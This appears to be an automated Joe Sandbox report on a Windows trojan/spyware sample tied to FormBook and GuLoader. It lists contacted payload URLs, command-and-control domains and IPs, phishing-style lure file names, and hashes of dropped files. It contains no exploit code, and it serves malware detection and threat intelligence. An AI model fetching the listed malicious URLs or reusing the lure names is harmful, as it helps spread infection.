                                                                                                                                                                                                            https://www.groupriam.com/?NImBm40hNZ2.exe, 00000003.00000003.17109671684.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213184378.00000000031C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/global/widgetCollapse.min.jImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                http://www.quovadis.bm0ImBm40hNZ2.exe, 00000003.00000003.17109671684.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.16872930361.00000000031C2000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031C2000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213184378.00000000031C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/menu/menuSetUp.min.js?ver=7ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/global/ajaxSearch.min.js?veImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=cmdkey.exe, 00000005.00000002.21528309746.000000000808F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                        https://gemini.google.com/app?q=cmdkey.exe, 00000005.00000002.21528309746.000000000808F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          https://www.groupriam.com/sCvgayhFHxN196.bin)ImBm40hNZ2.exe, 00000003.00000002.17212781148.0000000003188000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            unknown
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1529843
Start date and time: 2024-10-09 13:32:05 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 17m 54s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name: Suspected Instruction Hammering
Number of analysed new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: ImBm40hNZ2.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/12@18/14
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 85%
• Number of executed functions: 91
• Number of non-executed functions: 314
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): dllhost.exe
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryDirectoryFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: ImBm40hNZ2.exe
Time: 07:36:04
Type: API Interceptor
Description: 27208391x Sleep call for process: cmdkey.exe modified
                                                                                                                                                                                                                            • www.home-check.shop/bnkv/
                                                                                                                                                                                                                            176.57.64.102220204-TF1--00.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                            • www.ayypromo.shop/rgqx/
                                                                                                                                                                                                                            20-EM-00- PI-INQ-3001.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                            • www.ayypromo.shop/rgqx/
                                                                                                                                                                                                                            RFQ STR-160-01.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                            • www.ayypromo.shop/rgqx/
                                                                                                                                                                                                                            #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                            • www.ayypromo.shop/mktg/
                                                                                                                                                                                                                            031215-Revised-01.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                            • www.ayypromo.shop/rgqx/
                                                                                                                                                                                                                            Copy of 01. Bill of Material - 705.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                            • www.ayypromo.shop/rgqx/
                                                                                                                                                                                                                            Pro#U015bba o Wycena - Strony 4-6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                            • www.ayypromo.shop/mktg/
                                                                                                                                                                                                                            TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                            • www.ayypromo.shop/6ocx/
                                                                                                                                                                                                                            199.103.62.20502_deb64ed.bin.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                                              Solicitud de Cotizaci#U00f3n #U2013 Cat#U00e1logo de Muestras2024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                Richiesta di Offerta - Catalogo Campione.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                                                  #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                    Anfrage f#U00fcr ein Angebot - Musterkatalog.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                      47#U0627.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                        www.meetfactory.bizSolicitud de Cotizaci#U00f3n #U2013 Cat#U00e1logo de Muestras2024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                        • 45.33.2.79
                                                                                                                                                                                                                                        SecuriteInfo.com.Script.SNH-gen.5224.29912.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                        • 45.79.19.196
                                                                                                                                                                                                                                        #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                        • 96.126.123.244
                                                                                                                                                                                                                                        Pro#U015bba o Wycena - Strony 4-6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                        • 96.126.123.244
                                                                                                                                                                                                                                        TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                        • 45.33.30.197
                                                                                                                                                                                                                                        www.bullbord.topSolicitud de Cotizaci#U00f3n #U2013 Cat#U00e1logo de Muestras2024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                        • 203.161.46.205
                                                                                                                                                                                                                                        #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                        • 203.161.46.205
                                                                                                                                                                                                                                        Request for Quotation + sample catalog.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                        • 203.161.46.205
                                                                                                                                                                                                                                        Pro#U015bba o Wycena - Strony 4-6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                        • 203.161.46.205
                                                                                                                                                                                                                                        www.ayypromo.shopSolicitud de Cotizaci#U00f3n #U2013 Cat#U00e1logo de Muestras2024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                        • 176.57.64.102
                                                                                                                                                                                                                                        220204-TF1--00.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                        • 176.57.64.102
                                                                                                                                                                                                                                        20-EM-00- PI-INQ-3001.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                        • 176.57.64.102
                                                                                                                                                                                                                                        RFQ STR-160-01.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                        • 176.57.64.102
                                                                                                                                                                                                                                        #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                        • 176.57.64.102
                                                                                                                                                                                                                                        031215-Revised-01.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                        • 176.57.64.102
                                                                                                                                                                                                                                        Copy of 01. Bill of Material - 705.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                        • 176.57.64.102
                                                                                                                                                                                                                                        Pro#U015bba o Wycena - Strony 4-6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                        • 176.57.64.102
                                                                                                                                                                                                                                        TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                        • 176.57.64.102
                                                                                                                                                                                                                                        www.home-check.shopSolicitud de Cotizaci#U00f3n #U2013 Cat#U00e1logo de Muestras2024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                        • 185.230.15.3
                                                                                                                                                                                                                                        #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                        • 185.230.15.3
                                                                                                                                                                                                                                        PI#220824.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                        • 185.230.15.3
                                                                                                                                                                                                                                        PI #9100679047.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                        • 185.230.15.3
                                                                                                                                                                                                                                        Shipping Documents.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                        • 185.230.15.3
                                                                                                                                                                                                                                        Pro#U015bba o Wycena - Strony 4-6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                        • 185.230.15.3
                                                                                                                                                                                                                                        BL6387457290.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                        • 185.230.15.3
                                                                                                                                                                                                                                        Shipment Files EG240711& EG240712.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                        • 185.230.15.3
                                                                                                                                                                                                                                        www.hypepgbet.onlineSolicitud de Cotizaci#U00f3n #U2013 Cat#U00e1logo de Muestras2024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                        • 82.112.244.92
                                                                                                                                                                                                                                        #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                        • 82.112.244.92
                                                                                                                                                                                                                                        Pro#U015bba o Wycena - Strony 4-6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                        • 82.112.244.92
                                                                                                                                                                                                                                        www.itemfilterhub.shopSolicitud de Cotizaci#U00f3n #U2013 Cat#U00e1logo de Muestras2024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                        • 104.21.50.202
                                                                                                                                                                                                                                        #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                        • 172.67.166.145
                                                                                                                                                                                                                                        Pro#U015bba o Wycena - Strony 4-6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                        • 104.21.50.202
                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                        TAKE2USZ6s208B9QX.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                        • 107.163.130.249
                                                                                                                                                                                                                                        na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                        • 107.163.175.138
                                                                                                                                                                                                                                        PO For Bulk Order.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                        • 107.163.130.249
                                                                                                                                                                                                                                        RFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                        • 107.163.130.249
                                                                                                                                                                                                                                        SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                        • 107.163.130.249
Match: C:\Users\user\AppData\Local\Temp\nsy1C7B.tmp\System.dll

Associated Sample Name / URL | Detection | Threat Name
Payment copy.vbs | malicious | FormBook, GuLoader
Payment copy.vbs | malicious | GuLoader
SpdbSuite_v10.8_LANG.exe | malicious | Unknown
SpdbSuite_v10.8_LANG.exe | malicious | Unknown
SecuriteInfo.com.Trojan.Win32.VMProtect.31640.28512.exe | malicious | Unknown
Gescanntes Artikelliste_Bestellnummer 25477.vbs | malicious | FormBook, GuLoader
Gescanntes Artikelliste_Bestellnummer 25477.vbs | malicious | GuLoader
Fac001982024-06-05.pdf.exe | malicious | GuLoader
ALGOI-la tabla de c#U00e1lculos.xlsl.exe | malicious | GuLoader

Process: C:\Users\user\Desktop\ImBm40hNZ2.exe
File Type: MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
Category: dropped
Size (bytes): 908
Entropy (8bit): 3.2808327460368574
Encrypted: false
SSDEEP: 12:8wl0O0sXUd9CB+qAxOjYjbpQ15K04uZmNshW4t2YCBTo8:8e7aODK0fo+aJT
MD5: 59BD44D79D7E8A973C17B4042A141C68
SHA1: 7B3915FD1E20F4FF686F91264AB0FD835FE9C04C
SHA-256: 9E4E15C8C08A97CC65798BEE90BD585A25FF74FB4271B9300C5FB44902D8C67D
SHA-512: 155B64B5F325E0D18B04AD2310AEE85B4AB3D8785656B281F20486BD511132FFA26B8E684347F45EA58B4F34A212ACA128E56CACCFAC691554B4B232F761950A
Malicious: false
Reputation: low
Preview: L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........Public..>............................................P.u.b.l.i.c.....P.1...........Music.<............................................M.u.s.i.c.....t.2...........chieftainship.bar.T............................................c.h.i.e.f.t.a.i.n.s.h.i.p...b.a.r... ...'.....\.U.s.e.r.s.\.P.u.b.l.i.c.\.M.u.s.i.c.\.c.h.i.e.f.t.a.i.n.s.h.i.p...b.a.r.F.C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.P.i.n.d.e.b.r.n.d.e.s.\.n.o.r.m.a.l.i.t.e.t.e.n.s.\.S.w.e.a.t.s.u.i.t.........5...!..............2W..B.a...D.!...............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.4.2.5.3.1.6.5.6.7.-.2.9.6.9.5.8.8.3.8.2.-.3.7.7.8.2.2.2.4.1.4.-.1.0.0.1.................

Process: C:\Windows\SysWOW64\cmdkey.exe
File Type: SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
Category: dropped
Size (bytes): 135168
Entropy (8bit): 1.1142956103012707
Encrypted: false
SSDEEP: 192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6kvjd:8t4n/9p/39J6hwNKRmqu+7VusEtrd
                                                                                                                                                                                                                                                          MD5:E3F9717F45BF5FFD0A761794A10A5BB5
                                                                                                                                                                                                                                                          SHA1:EBD823E350F725F29A7DE7971CD35D8C9A5616CC
                                                                                                                                                                                                                                                          SHA-256:D79535761C01E8372CCEB75F382E912990929624EEA5D7093A5A566BAE069C70
                                                                                                                                                                                                                                                          SHA-512:F12D2C7B70E898ABEFA35FEBBDC28D264FCA071D66106AC83F8FC58F40578387858F364C838E69FE8FC66645190E1CB2B4B63791DDF77955A1C376424611A85D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\ImBm40hNZ2.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):462406
                                                                                                                                                                                                                                                          Entropy (8bit):2.654120104593977
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:N0Zv7tdkzVZEvSOjcL+8E9sPBcybc8BOYAgjNRvEXwuzQDh1l0mY43frkdRwGkYZ:n8BWk7SzJ9ynyM5+663Og+dKlBi2O
                                                                                                                                                                                                                                                          MD5:B10F8C50F169E6BA850E8AE984DB5D15
                                                                                                                                                                                                                                                          SHA1:953A30728554D87B4C9CC1BD308BD2B9DCE23553
                                                                                                                                                                                                                                                          SHA-256:865F8417D84EE8EBFCB82FE6F9CBE53E8684CFE198B24C99D9792945DFB71FFF
                                                                                                                                                                                                                                                          SHA-512:9E183934673FEDB7DCEF683709449B10ABC05C55CBB043CCBA0C5F5218BB6F445D68D6E086D1472A9B779EEB47CD0741113FA143E42CB6BF42CDE50D11FD4A89
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\ImBm40hNZ2.exe
                                                                                                                                                                                                                                                          File Type:GTA audio index data (SDT)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):354911
                                                                                                                                                                                                                                                          Entropy (8bit):1.2495424264884372
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Mh2p8ZOcN5dHUpkDIF7Nmi8BtV/UA+NGBe6ilbUpqpSXZyBFCYJI5RY5UaDXUN6R:jJ6SW7cAIvP2U8mlff5ndkZttOuwJ
                                                                                                                                                                                                                                                          MD5:32D41B5BEB9F4F21054B26B90A440E44
                                                                                                                                                                                                                                                          SHA1:54013D76C15CCE880BA2DFA7D34E4AB0BDBE83FC
                                                                                                                                                                                                                                                          SHA-256:E8F40FF3793B165AD4110D7CC1E6E370B6241B29E35B3B0E9AE99E51E4BD543B
                                                                                                                                                                                                                                                          SHA-512:3DDD25A8F4FB99EC483F571914FC6807734516FCD879761A87E835307E92FE2483F9D8F2F2CACFF864D0AB424B48294555B4FB40546DF21161B708CA5AC246AF
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\ImBm40hNZ2.exe
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):229183
                                                                                                                                                                                                                                                          Entropy (8bit):7.481891661221711
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3072:MZ9sfapoPC4FKfI5MRmNDyCwQ5CZagzG6kZTvwlu7Z8qtGoH+mYPMGy0q3KsrSjn:M4CpvKQ8S2xUqt+Q0q3KsE5ABAnp6HY
                                                                                                                                                                                                                                                          MD5:379294FDCCE775D9CE733A0B7294260C
                                                                                                                                                                                                                                                          SHA1:3DAEF772A4F4688C95EA08CCBEF2ED424BFDEB90
                                                                                                                                                                                                                                                          SHA-256:F6705A6AF06A62741E627CE8D357EEBA5A35931879F92C56C9DC2707FAC3EC4C
                                                                                                                                                                                                                                                          SHA-512:2F038AFE099060C1F2ADFEF6BCF4137F81044F55ECF64D26EEF5611CFDD44E85B7DA80BEC08E72FA3888BA276AED1A55901C08DBEDACF27C887281F3DBFF34CA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\ImBm40hNZ2.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):581
                                                                                                                                                                                                                                                          Entropy (8bit):4.247738765138132
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:eiwqgdTZq+M/MvHk6WBhciFy0oAXRwzAwGdxFh/Zk4PW6://QTOxLBhciFJwfGRRB
                                                                                                                                                                                                                                                          MD5:A2BEE9525A0EB672F9D7C6ED55FC4277
                                                                                                                                                                                                                                                          SHA1:8797F725F3C1F58853BDDF233CF3AD8FB25B96B8
                                                                                                                                                                                                                                                          SHA-256:465809DC29146F2953E585A70F7C0F4EB8DFAECD1B5E0044BA3E84F7CB369EF4
                                                                                                                                                                                                                                                          SHA-512:23055FFBE3080E2AC583108D8F04A8C39F86A9B6061078DC7E857F2D55E87995DAFBC2BC92A6E1138E8C4746349CEDD841D57CE0C1053561B4F13A941AFC2DB3
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:artiskokkers theatricalising serviceorganisationens sadomasokist specialet viragoes teksturens drosselventilen dorsoanterior lyle connexiva anlbshavnenes fantasipris..bkkenbund crackups smelteovne trampolinernes.akvamarins sdefdselen paragrafrytter strabadseringer paasejling chromicise opkaldninger oprykkedes jehulen drejede unfraternising roitelet marketenderes..trvesmulds lymphorrhea sharpe prevened patulous tandhjulets feudaltidernes,klagetemaers inexpleble sekundanten radioapparat ostreidae pragmatikers paleobotanist commonalties unreparted..spigr midtowns biomstndighed,
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\ImBm40hNZ2.exe
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):368479
                                                                                                                                                                                                                                                          Entropy (8bit):1.2529543823589329
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:tQVWVhMfKCe/xuJeVqJTfk894T2Vdxg6O6/:sKhM9eg+qVkI4yZo6/
                                                                                                                                                                                                                                                          MD5:D4FB58D0C2D76DF9F83C7A35C6AB87BD
                                                                                                                                                                                                                                                          SHA1:85C3135397993DB1194516AB38F28367A5376C7F
                                                                                                                                                                                                                                                          SHA-256:6A82CFEB143DF6CE6AF2B4C0DE44BBA58B291A7156E4E083CB279918E7986788
                                                                                                                                                                                                                                                          SHA-512:73B456FF13154CD4B082A89C45FC7BD0C8E5BA26BBF8B8148E4B37E537A5C51209F9E2FBB60DAD4B83CF592EB37EEACFB27E36314503A8AA319AFC3C6CDA85B6
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\ImBm40hNZ2.exe
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):485274
                                                                                                                                                                                                                                                          Entropy (8bit):1.2570482706289725
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:zprlz03eesdLNNRG1seTqgPcjek1qmE28Cvo:zpJ0tgXIsePYv1qO
                                                                                                                                                                                                                                                          MD5:4F3056AE6E63F803C909F39DE6A4E4F2
                                                                                                                                                                                                                                                          SHA1:6ABC069B436C5B9807421F678E38C20813A7FB6A
                                                                                                                                                                                                                                                          SHA-256:5DD4899CACB0CB0DAA3BCFAC4010E784F4CAA32655F018D4A83E0C4C7C8B74A7
                                                                                                                                                                                                                                                          SHA-512:EF4AC1C52EAF4A4FAF5EF1260C3E51F699A844EAAAF9746B2910B6BE3A48968F1001C4B2740D10BCF3F8AB7809C7695FE418237351B8EDD757B4F1FCD66B0CCB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\ImBm40hNZ2.exe
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):224663
                                                                                                                                                                                                                                                          Entropy (8bit):1.2605625692541917
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:7Z7wfFTLxvdkcxqASGj3xSNrThO/Zolgzcxl8C8RMYTX22DtsBbgIflPkjjvaM9w:2Nl2pJig1wiskjgQ
                                                                                                                                                                                                                                                          MD5:07437DF4326D58E6A143168479E5D29A
                                                                                                                                                                                                                                                          SHA1:1BE5D0DB5B7548439E2B78486842C74BFB6383FD
                                                                                                                                                                                                                                                          SHA-256:8993114407456C6D9CA7F6EBD1A0A17B6782A7FBE8285280472D636DB9A112D8
                                                                                                                                                                                                                                                          SHA-512:D797B5B452F68FE15DB6B61ECD8BB808B53C6518287F3CB520B1F6089EB39CBBD24E48913B48437425268EAEFB9672D863FFC140A2C257F6269F7E19A35C5B70
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\ImBm40hNZ2.exe
                                                                                                                                                                                                                                                          File Type:Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):40518
                                                                                                                                                                                                                                                          Entropy (8bit):1.2432837040632625
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:irrisGf4AVsRePdfnAXWMwNqse2afUDUKHlHWgooi:Ok9AXCqsoUflHWld
                                                                                                                                                                                                                                                          MD5:8DA91BF8F61EC9213853BE5029C28642
                                                                                                                                                                                                                                                          SHA1:107E53B89C087EB27B9BAECA1567AB6FDF4C4C6F
                                                                                                                                                                                                                                                          SHA-256:72EB5DC647ECE46BED97D5B9858DD3008AAF63C1B8DD54CF6E407F1F0A0880D2
                                                                                                                                                                                                                                                          SHA-512:9A6D7022A9F07B57C737849AC3871F7B76280F56509F5715AFD03D64EA43E3629678B02195367EA8632D36BC86FE02F341FA509D2CD034E83D9DC75BB473AFFB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\ImBm40hNZ2.exe
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):160082
                                                                                                                                                                                                                                                          Entropy (8bit):1.2402700863301843
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:cs4KgBhZobYVCLYip1ev9yBYIqf2Iv7uD4zrly7+eaYHJFihH6AMp8S6cGT099IK:cfhjLekt/BOT5o1K
                                                                                                                                                                                                                                                          MD5:F43ABF4AC85CDF7C310AD9C5699AD8DE
                                                                                                                                                                                                                                                          SHA1:05A379A7F953CC80D2F4C9827D8499F1E96BDE87
                                                                                                                                                                                                                                                          SHA-256:271EEB9BCFB8D226539223CAFA6801E963196B4D334659D02998D119C6ACC224
                                                                                                                                                                                                                                                          SHA-512:6587CCEF3AFB4F6E31B7D775BD6CE02C8AC2FEE7CC00CA367F4F83761ED5BC40F1276CE111B768994FC2F88881F357D2660794E3E3F8329D47C974866A6CBA21
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\ImBm40hNZ2.exe
                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):11264
                                                                                                                                                                                                                                                          Entropy (8bit):5.757895701334371
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:aVL7iZJX76BisO7+UZEw+Rl59pV8ghsVJ39dx8T:d7NsOpZsfLMJ39e
                                                                                                                                                                                                                                                          MD5:A436DB0C473A087EB61FF5C53C34BA27
                                                                                                                                                                                                                                                          SHA1:65EA67E424E75F5065132B539C8B2EDA88AA0506
                                                                                                                                                                                                                                                          SHA-256:75ED40311875312617D6711BAED0BE29FCAEE71031CA27A8D308A72B15A51E49
                                                                                                                                                                                                                                                          SHA-512:908F46A855480AF6EACB2FB64DE0E60B1E04BBB10B23992E2CF38A4CBEBDCD7D3928C4C022D7AD9F7479265A8F426B93EEF580AFEC95570E654C360D62F5E08D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                                                                          • Filename: Payment copy.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                                                          • Filename: Payment copy.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                                                          • Filename: SpdbSuite_v10.8_LANG.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                          • Filename: SpdbSuite_v10.8_LANG.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Trojan.Win32.VMProtect.31640.28512.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                          • Filename: Gescanntes Artikelliste_Bestellnummer 25477.vbs, Detection: malicious, Browse
